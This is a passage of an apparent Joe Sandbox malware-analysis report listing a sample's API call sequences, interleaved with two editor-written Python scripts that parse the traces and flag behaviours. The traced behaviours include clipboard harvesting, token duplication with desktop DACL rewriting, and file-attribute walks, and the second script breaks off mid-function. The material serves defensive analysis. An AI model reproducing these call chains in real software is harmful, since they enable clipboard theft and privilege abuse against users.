• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3977979337-4164748364
• Opcode ID: 93e209f745987a38b2e4177142559d9ed5a31233525b97f962878714411e1e50
• Instruction ID: 928d59ce5f80a3d58c6ba5b19fbae1e52770770f5f8e8aaa88fb7cc16ade0db6
• Opcode Fuzzy Hash: 93e209f745987a38b2e4177142559d9ed5a31233525b97f962878714411e1e50
• Instruction Fuzzy Hash: 4742D07021834A9FD725DF24C888B7ABBEAFF49390F140629F699872A1C771D864CF51
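The "APIs" blocks above follow one fixed line format (API name, module, argument list as printed by the plugin, call-site address, and a "Part of subcall function" prefix for calls made from callees). As an added example, not code from Joe Sandbox or from the analysed sample, the following Python parses that format and decodes the arguments of the token and desktop calls listed on this page: the DuplicateTokenEx impersonation level and token type, and the access masks passed to OpenWindowStationW and OpenDesktopW. The SAMPLE text is copied from two listings on this page; the "token chain" heuristic and the constant tables (winnt.h / winuser.h values) are the editor's additions, not report output.

```python
"""Parser for the "APIs" blocks of a Joe Sandbox IDA-plugin function listing.
Added example, not Joe Sandbox code: SAMPLE is copied from two listings on this page;
the chain heuristic and the constant tables are the editor's additions."""
import re
from collections import namedtuple

# One bullet line.  Shapes seen on the page:  "• Api.MODULE(args), ref: ADDR",
# "• Part of subcall function ADDR: Api.MODULE ref: ADDR",  "• Api.MODULE ref: ADDR"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z_]\w*)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
# args: raw strings, "?" = unresolved; ref: call-site address; parent: sub-function start or None
ApiCall = namedtuple("ApiCall", "api module args ref parent")


def parse_listing(text):
    """Return one list of ApiCall per "APIs" header; other lines (hashes, dumps) are skipped."""
    functions, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = []
            functions.append(cur)
            continue
        m = API_LINE.match(s) if cur is not None else None
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.append(ApiCall(m["api"], m["module"], args, m["ref"], m["parent"]))
    return functions


def hex_arg(a):
    """Integer value of a resolved hex argument; None for '?' or a string literal."""
    try:
        return int(a, 16)
    except ValueError:
        return None


# winnt.h / winuser.h values (editor's table, limited to the bits seen on this page)
IMPERSONATION = {0: "SecurityAnonymous", 1: "SecurityIdentification",
                 2: "SecurityImpersonation", 3: "SecurityDelegation"}
TOKEN_TYPE = {1: "TokenPrimary", 2: "TokenImpersonation"}
ACCESS_BITS = [(0x00080000, "WRITE_OWNER"), (0x00040000, "WRITE_DAC"),
               (0x00020000, "READ_CONTROL"), (0x00010000, "DELETE"),
               (0x00000080, "DESKTOP_WRITEOBJECTS"), (0x00000001, "DESKTOP_READOBJECTS")]
ACCESS_ARG_INDEX = {"OpenWindowStationW": 2, "OpenDesktopW": 3}  # dwDesiredAccess position


def decode_duplicate_token(call):
    """DuplicateTokenEx(hTok, dwAccess, pAttrs, ImpersonationLevel, TokenType, phNew)."""
    if call.api != "DuplicateTokenEx" or len(call.args) < 5:
        return None
    return (IMPERSONATION.get(hex_arg(call.args[3]), "?"),
            TOKEN_TYPE.get(hex_arg(call.args[4]), "?"))


def decode_access_mask(value):
    return [name for bit, name in ACCESS_BITS if value & bit]


def flag_token_chain(calls):
    """Editor's heuristic: privilege adjustment + token duplication + a window-station or
    desktop open in one function (the sequence used to start a process as another user).
    Sub-function calls count, because the plugin lists them under the caller."""
    names = {c.api for c in calls}
    return bool("AdjustTokenPrivileges" in names and "DuplicateTokenEx" in names
                and {"OpenWindowStationW", "OpenDesktopW"} & names)


# Constructed input: two "APIs" blocks copied from this page's listing.
SAMPLE = """\
APIs
  • Part of subcall function 002D4005: FindFirstFileW.KERNEL32(?,?), ref: 002D407C
• GetLastError.KERNEL32 ref: 002DC292
Memory Dump Source
APIs
  • Part of subcall function 002C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C93E3
  • Part of subcall function 002C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C9410
• _memset.LIBCMT ref: 002C8F71
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002C8FC3
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002C8FEB
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002C9028
Strings
"""


def analyse(text=SAMPLE):
    """One summary line per function: call count, chain verdict, decoded token/desktop args."""
    out = []
    for i, calls in enumerate(parse_listing(text)):
        line = f"function {i}: {len(calls)} calls, token chain={flag_token_chain(calls)}"
        for c in calls:
            if c.api == "DuplicateTokenEx":
                line += f"; DuplicateTokenEx -> {decode_duplicate_token(c)}"
            elif c.api in ACCESS_ARG_INDEX:
                mask = hex_arg(c.args[ACCESS_ARG_INDEX[c.api]])
                line += f"; {c.api} access={decode_access_mask(mask)}"
        out.append(line)
    return out


if __name__ == "__main__":
    print("\n".join(analyse()))
```

Run against the sample, the second function decodes to a SecurityImpersonation-level primary token, winsta0 opened with READ_CONTROL | WRITE_DAC, and the "default" desktop opened with READ_CONTROL | WRITE_DAC | DESKTOP_READOBJECTS | DESKTOP_WRITEOBJECTS, which is what a caller needs in order to rewrite those objects' DACLs before launching a process under the duplicated token. Two caveats: the plugin prints more stack slots than the function takes (DuplicateTokenEx shows twelve), so decode by documented parameter position rather than by counting from the end, and a "?" argument is unresolved, not zero.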
                                                                            APIs
                                                                              • Part of subcall function 002C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C93E3
                                                                              • Part of subcall function 002C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C9410
                                                                              • Part of subcall function 002C9399: GetLastError.KERNEL32 ref: 002C941D
                                                                            • _memset.LIBCMT ref: 002C8F71
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002C8FC3
                                                                            • CloseHandle.KERNEL32(?), ref: 002C8FD4
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002C8FEB
                                                                            • GetProcessWindowStation.USER32 ref: 002C9004
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 002C900E
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002C9028
                                                                              • Part of subcall function 002C8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002C8F27), ref: 002C8DFE
                                                                              • Part of subcall function 002C8DE9: CloseHandle.KERNEL32(?,?,002C8F27), ref: 002C8E10
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                            • String ID: $default$winsta0
                                                                            • API String ID: 2063423040-1027155976
                                                                            • Opcode ID: 688b6544a48bbaa4f3f90ef543bdacbf70f808e240eb76845669d68c1ac05e0e
                                                                            • Instruction ID: 81ba3cbeb5d3842dcc27bd3375af06396ec5aea650aba487605ac623f3631f1b
                                                                            • Opcode Fuzzy Hash: 688b6544a48bbaa4f3f90ef543bdacbf70f808e240eb76845669d68c1ac05e0e
                                                                            • Instruction Fuzzy Hash: ED816B7192120ABFDF129FA4CC49FEE7B79EF04304F084259F914A2260DB728A65DF50
                                                                            APIs
                                                                            • OpenClipboard.USER32(00300980), ref: 002E465C
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 002E466A
                                                                            • GetClipboardData.USER32(0000000D), ref: 002E4672
                                                                            • CloseClipboard.USER32 ref: 002E467E
                                                                            • GlobalLock.KERNEL32(00000000), ref: 002E469A
                                                                            • CloseClipboard.USER32 ref: 002E46A4
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 002E46B9
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 002E46C6
                                                                            • GetClipboardData.USER32(00000001), ref: 002E46CE
                                                                            • GlobalLock.KERNEL32(00000000), ref: 002E46DB
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 002E470F
                                                                            • CloseClipboard.USER32 ref: 002E481F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                            • String ID:
                                                                            • API String ID: 3222323430-0
                                                                            • Opcode ID: 8560173accba91e47d8d9a300b64c01f03b8d00e6df2c3931c228d82a6c5dc3c
                                                                            • Instruction ID: 74af3c790664fc6f7323cfec7f7bee92749aa6fc3db036521a1a29afd856a4d3
                                                                            • Opcode Fuzzy Hash: 8560173accba91e47d8d9a300b64c01f03b8d00e6df2c3931c228d82a6c5dc3c
                                                                            • Instruction Fuzzy Hash: CB51D0312A5286ABD305FF21DC99F6E73ACAF84B00F40052AF55AD21E1DF70D8258F62
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 002DF5F9
                                                                            • _wcscmp.LIBCMT ref: 002DF60E
                                                                            • _wcscmp.LIBCMT ref: 002DF625
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 002DF637
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 002DF651
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 002DF669
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF674
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 002DF690
                                                                            • _wcscmp.LIBCMT ref: 002DF6B7
                                                                            • _wcscmp.LIBCMT ref: 002DF6CE
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 002DF6E0
                                                                            • SetCurrentDirectoryW.KERNEL32(0032B578), ref: 002DF6FE
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 002DF708
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF715
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF727
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*$S-
                                                                            • API String ID: 1803514871-3250822365
                                                                            • Opcode ID: d918b010e3c506237bd0f17af0b46c428828bfde51cbcf2f9cf10f3cfcc101e0
                                                                            • Instruction ID: e57db15a4e1fb2ce93f13a08791cc741e685a69c130d02d89de62ed93cb4f498
                                                                            • Opcode Fuzzy Hash: d918b010e3c506237bd0f17af0b46c428828bfde51cbcf2f9cf10f3cfcc101e0
                                                                            • Instruction Fuzzy Hash: C131363161121A6BDF15DFB4ED59AEEB3ACAF09321F100167F816D32A0DB30DE54CA64
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 002DCDD0
                                                                            • FindClose.KERNEL32(00000000), ref: 002DCE24
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002DCE49
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002DCE60
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 002DCE87
                                                                            • __swprintf.LIBCMT ref: 002DCED3
                                                                            • __swprintf.LIBCMT ref: 002DCF16
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            • __swprintf.LIBCMT ref: 002DCF6A
                                                                              • Part of subcall function 002938C8: __woutput_l.LIBCMT ref: 00293921
                                                                            • __swprintf.LIBCMT ref: 002DCFB8
                                                                              • Part of subcall function 002938C8: __flsbuf.LIBCMT ref: 00293943
                                                                              • Part of subcall function 002938C8: __flsbuf.LIBCMT ref: 0029395B
                                                                            • __swprintf.LIBCMT ref: 002DD007
                                                                            • __swprintf.LIBCMT ref: 002DD056
                                                                            • __swprintf.LIBCMT ref: 002DD0A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 3953360268-2428617273
                                                                            • Opcode ID: a9acb8789e4dbcb83914511f253893b800f6be26e2cec0daee1c93fce672ed19
                                                                            • Instruction ID: 99c5facb6557181295534339752ddd2ad13cf9f803e6e61fb2cb6a7f89143b0a
                                                                            • Opcode Fuzzy Hash: a9acb8789e4dbcb83914511f253893b800f6be26e2cec0daee1c93fce672ed19
                                                                            • Instruction Fuzzy Hash: 63A15EB1425305ABC714FFA4D885EAFB7ECEF94700F40491AF589C6191EB70EA19CB62
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002F0FB3
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00300980,00000000,?,00000000,?,?), ref: 002F1021
                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002F1069
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002F10F2
                                                                            • RegCloseKey.ADVAPI32(?), ref: 002F1412
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 002F141F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 536824911-966354055
                                                                            • Opcode ID: 55d138dac597d0b9efa7e3de0f584701a06aeac16edbe0bb7e5e9d685e471663
                                                                            • Instruction ID: 1db5d77875a37b0cf3ef1f7e7090ebf85100a470a03c9faac176783838156de3
                                                                            • Opcode Fuzzy Hash: 55d138dac597d0b9efa7e3de0f584701a06aeac16edbe0bb7e5e9d685e471663
                                                                            • Instruction Fuzzy Hash: 4B025975220611DFCB14EF25C891A2AB7E5FF89714F04856DF9899B2A2CB30ED21CF81
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 002DF756
                                                                            • _wcscmp.LIBCMT ref: 002DF76B
                                                                            • _wcscmp.LIBCMT ref: 002DF782
                                                                              • Part of subcall function 002D4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002D4890
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 002DF7B1
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF7BC
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 002DF7D8
                                                                            • _wcscmp.LIBCMT ref: 002DF7FF
                                                                            • _wcscmp.LIBCMT ref: 002DF816
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 002DF828
                                                                            • SetCurrentDirectoryW.KERNEL32(0032B578), ref: 002DF846
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 002DF850
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF85D
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF86F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*$j-
                                                                            • API String ID: 1824444939-1844594218
                                                                            • Opcode ID: 10b7ac8539bf087af7d078210640d5b1d8b651679430d303a7b7a51d5e8c413e
                                                                            • Instruction ID: 0019db4817a53bc9a7e8ee5e82479cc5b4453848d200cf07987ce75b98cebfae
                                                                            • Opcode Fuzzy Hash: 10b7ac8539bf087af7d078210640d5b1d8b651679430d303a7b7a51d5e8c413e
                                                                            • Instruction Fuzzy Hash: 3D31287150121A6BEF15EFB4DD58AEEB3AC9F09320F100167F805E22A1DB30DE65DB64
                                                                            APIs
                                                                              • Part of subcall function 002C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C8E3C
                                                                              • Part of subcall function 002C8E20: GetLastError.KERNEL32(?,002C8900,?,?,?), ref: 002C8E46
                                                                              • Part of subcall function 002C8E20: GetProcessHeap.KERNEL32(00000008,?,?,002C8900,?,?,?), ref: 002C8E55
                                                                              • Part of subcall function 002C8E20: HeapAlloc.KERNEL32(00000000,?,002C8900,?,?,?), ref: 002C8E5C
                                                                              • Part of subcall function 002C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C8E73
                                                                              • Part of subcall function 002C8EBD: GetProcessHeap.KERNEL32(00000008,002C8916,00000000,00000000,?,002C8916,?), ref: 002C8EC9
                                                                              • Part of subcall function 002C8EBD: HeapAlloc.KERNEL32(00000000,?,002C8916,?), ref: 002C8ED0
                                                                              • Part of subcall function 002C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002C8916,?), ref: 002C8EE1
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002C8931
                                                                            • _memset.LIBCMT ref: 002C8946
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002C8965
                                                                            • GetLengthSid.ADVAPI32(?), ref: 002C8976
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 002C89B3
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002C89CF
                                                                            • GetLengthSid.ADVAPI32(?), ref: 002C89EC
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002C89FB
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 002C8A02
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002C8A23
                                                                            • CopySid.ADVAPI32(00000000), ref: 002C8A2A
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002C8A5B
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002C8A81
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002C8A95
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            • Opcode ID: 73e914d4848883f6c1f89459de9760b6b0888b519395af364afbdd90ed29305b
                                                                            • Instruction ID: 2d8ba42dd1f4c8df2919229687b194bb6d529996518fea84e272c847321767b7
                                                                            • Opcode Fuzzy Hash: 73e914d4848883f6c1f89459de9760b6b0888b519395af364afbdd90ed29305b
                                                                            • Instruction Fuzzy Hash: 0561367595020AAFDF05DFA5DC55FEEBB79FF04300F04822AE816A6290DB319A25CF60
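                                                                            The API sequences in the function blocks above are the behaviours an analyst would want pulled out of a report like this automatically: clipboard reads requesting CF_UNICODETEXT (0x0D) and CF_TEXT (0x01), DuplicateTokenEx followed by opening winsta0 and the default desktop with WRITE_DAC, the GetUserObjectSecurity/AddAce/SetUserObjectSecurity edit of a window-station or desktop DACL, and the FindFirstFileW/SetFileAttributesW directory walk. The following Python is an added example, not part of the Joe Sandbox report or of the sample's code: it parses trace lines in the format this page uses and matches each function block against a small set of behaviour signatures. The signature names, the trace excerpt (constructed from lines on this page) and the argument decodings (documented Win32 constant values mapped onto argument positions by the public API signatures) are assumptions of this example, not Joe Sandbox's own signatures.

```python
"""Behavioural triage of Joe Sandbox "APIs" trace blocks (added example)."""
import re

# Constructed input: API lines copied from four function blocks of this report.
SAMPLE_TRACE = """\
APIs
• OpenClipboard.USER32(00300980), ref: 002E465C
• IsClipboardFormatAvailable.USER32(0000000D), ref: 002E466A
• GetClipboardData.USER32(0000000D), ref: 002E4672
• CloseClipboard.USER32 ref: 002E467E
• GlobalLock.KERNEL32(00000000), ref: 002E469A
• IsClipboardFormatAvailable.USER32(00000001), ref: 002E46C6
• GetClipboardData.USER32(00000001), ref: 002E46CE
APIs
  • Part of subcall function 002C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C93E3
  • Part of subcall function 002C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C9410
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002C8FC3
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002C8FEB
• SetProcessWindowStation.USER32(00000000), ref: 002C900E
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002C9028
APIs
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002C8931
• GetAce.ADVAPI32(?,00000000,?), ref: 002C89B3
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002C89CF
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002C8A81
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 002C8A95
APIs
• FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 002DF5F9
• SetFileAttributesW.KERNEL32(?,?), ref: 002DF651
• FindNextFileW.KERNEL32(00000000,?), ref: 002DF669
• SetCurrentDirectoryW.KERNEL32(?), ref: 002DF6E0
"""

# One trace line: optional "Part of subcall function X: " prefix, Api.MODULE,
# optional "(args)", then "ref: <call-site address>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Behaviour signatures (names are assumptions of this example): a block
# matches when its set of called APIs contains every API listed.
BEHAVIOURS = {
    "clipboard_harvest": {"OpenClipboard", "GetClipboardData", "GlobalLock"},
    "token_dup_and_desktop_switch": {"DuplicateTokenEx", "OpenWindowStationW",
                                     "SetProcessWindowStation", "OpenDesktopW"},
    "winsta_desktop_dacl_edit": {"GetSecurityDescriptorDacl", "AddAce",
                                 "SetUserObjectSecurity"},
    "dirwalk_set_attributes": {"FindFirstFileW", "FindNextFileW",
                               "SetFileAttributesW", "SetCurrentDirectoryW"},
    "remote_registry_write": {"RegConnectRegistryW", "RegSetValueExW"},
}

# Documented Win32 constants used to decode arguments.
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}
IMPERSONATION_LEVELS = {0: "SecurityAnonymous", 1: "SecurityIdentification",
                        2: "SecurityImpersonation", 3: "SecurityDelegation"}
TOKEN_TYPES = {1: "TokenPrimary", 2: "TokenImpersonation"}
STANDARD_RIGHTS = {0x10000: "DELETE", 0x20000: "READ_CONTROL",
                   0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}


def parse_trace(text):
    """Split the trace into function blocks (one per 'APIs' header) of call dicts."""
    blocks = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append([])
            continue
        m = CALL_RE.match(line)
        if not m or not blocks:
            continue  # 'Strings', 'Memory Dump Source' etc. are not calls
        args = m.group("args")
        blocks[-1].append({"api": m.group("api"), "module": m.group("mod"),
                           "args": args.split(",") if args is not None else [],
                           "ref": m.group("ref"), "subcall": m.group("sub")})
    return blocks


def _hex(arg):
    """Numeric value of a trace argument, or None for '?' or a string literal."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def access_names(mask):
    """Render the standard-rights bits of an access mask; keep object-specific bits raw."""
    names = [name for bit, name in sorted(STANDARD_RIGHTS.items()) if mask & bit]
    specific = mask & ~sum(STANDARD_RIGHTS)
    if specific:
        names.append(f"specific=0x{specific:X}")
    return "|".join(names) or "0"


def decode_call(call):
    """Human-readable notes for the arguments that matter in triage (empty if none)."""
    api, args = call["api"], call["args"]
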